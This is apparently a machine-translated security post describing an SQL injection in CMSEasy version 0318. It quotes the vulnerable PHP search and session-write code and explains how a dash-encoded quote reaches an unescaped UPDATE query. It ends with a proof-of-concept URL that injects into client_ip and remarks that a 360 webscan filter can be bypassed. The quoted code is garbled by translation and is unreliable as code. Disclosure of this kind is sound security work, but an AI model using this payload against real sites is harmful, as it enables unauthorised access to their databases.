The latest cmseasy Injection

The latest cmseasy Injection

Unfortunately, 360 webscan is not bypassed (in fact, it is easy to bypass)

Cmseasy, latest version 0318, has an injection


Vulnerability file:/lib/default/archive_act.php

250-rows:
 

Function search_action () {// print_r ($ _ SESSION); exit (); if (front: get ('ule') {front :: $ get ['keyword'] = str_replace ('-', '%', front: $ get ['keyword']); front :: $ get ['keyword'] = urldecode (front: $ get ['keyword']);} if (front: get ('keyword ')&&! Front: post ('keyword') front: $ post ['keyword'] = front: get ('keyword'); front: check_type (front :: post ('keyword'), 'safe '); if (front: post ('keyword') {$ this-> view-> keyword = trim (front :: post ('keyword'); session: set ('keyword', trim (front: post ('keyword');/* if (isset (front :: $ get ['keyword']) front: redirect (preg_replace ('/keyword = [^ &] +/', 'keyword= '. urlencode ($ this-> view-> keyword), front: $ uri); else front: redirect (front: $ uri. '& keyword = '. urlencode ($ this-> view-> keyword); */} else {$ this-> view-> keyword = session: get ('keyword ');} if (preg_match ('/union/I', $ this-> view-> keyword) | preg_match ('/"/I', $ this-> view-> keyword) | preg_match ('/\'/I ', $ this-> view-> keyword) {exit ('invalid parameter ');}

Important code:
 

if (front::get('ule')) {            front::$get['keyword'] = str_replace('-', '%', front::$get['keyword']);            front::$get['keyword'] = urldecode(front::$get['keyword']);        }

The ule obtained by get exists to enter this condition statement.

-Urldecode after % is changed

As a result, you can directly introduce '. You only need to pass in-27.



Check again
 

session::set('keyword', trim(front::post('keyword')));

Corresponding function code:
 

class session {    static function get($key) {        if (isset($_SESSION[$key]))            return $_SESSION[$key];        else            return false;    }    static function set($key,$var) {        $_SESSION[$key]=$var;    }    static function del($key) {        unset($_SESSION[$key]);    }}//session_start();

Cmseasy performs a write operation after the session value is assigned.

/Lib/plugins/stsession. php
 

public function write($id,$data) {$sql = "SELECT * FROM {$this->_prefix}sessionox where PHPSESSID = '$id'";//var_dump($sql);$res = $this->_db->query($sql);$time = time();$row = $this->_db->fetch_array($res);if ($row) {//if ($row['data'] != $data) {$sql = "UPDATE {$this->_prefix}sessionox SET update_time='$time',data='$data' WHERE PHPSESSID = '$id'";$this->_db->query($sql);//}} else {if (!empty($data)) {$sql = "INSERT INTO {$this->_prefix}sessionox (PHPSESSID, update_time, client_ip, data) VALUES ('$id','$time','$this->_ip','$data')";$this->_db->query($sql);}}return true;}

$ Injection caused by the update operation of data



The subsequent parameter preg_match is not affected after the database operation.
 

If (preg_match ('/union/I', $ this-> view-> keyword) | preg_match ('/"/I', $ this-> view-> keyword) | preg_match ('/\'/I ', $ this-> view-> keyword) {exit ('invalid parameter ');}

The interception white list has also been changed, and it cannot be used to bypass 360 webscan.
 

/*** Blocking directory white list */function webscan_white ($ webscan_white_name, $ webscan_white_url = array () {$ url_path = $ _ SERVER ['script _ name']; foreach ($ _ GET as $ key => $ value) {$ url_var. = $ key. "= ". $ value. "&";} if (preg_match ("/". $ webscan_white_name. "/is", $ url_path) = 1 &&! Empty ($ webscan_white_name) {return false;} foreach ($ webscan_white_url as $ key => $ value) {if (! Empty ($ url_var )&&! Empty ($ value) {if (stristr ($ url_path, $ key) & stristr ($ url_var, $ value) {return false ;}} elseif (empty ($ url_var) & empty ($ value) {if (stristr ($ url_path, $ key) {return false ;}} return true ;}

 

Verify that there is an injection



Http: // 127.0.0.1/cmseasy/index. php? Case = archive & act = search & keyword =-27, client_ip = user ()-23 & ule = 1
 

 

Attackers can bypass 360webscan to directly perform blind injection.

Solution:

Filter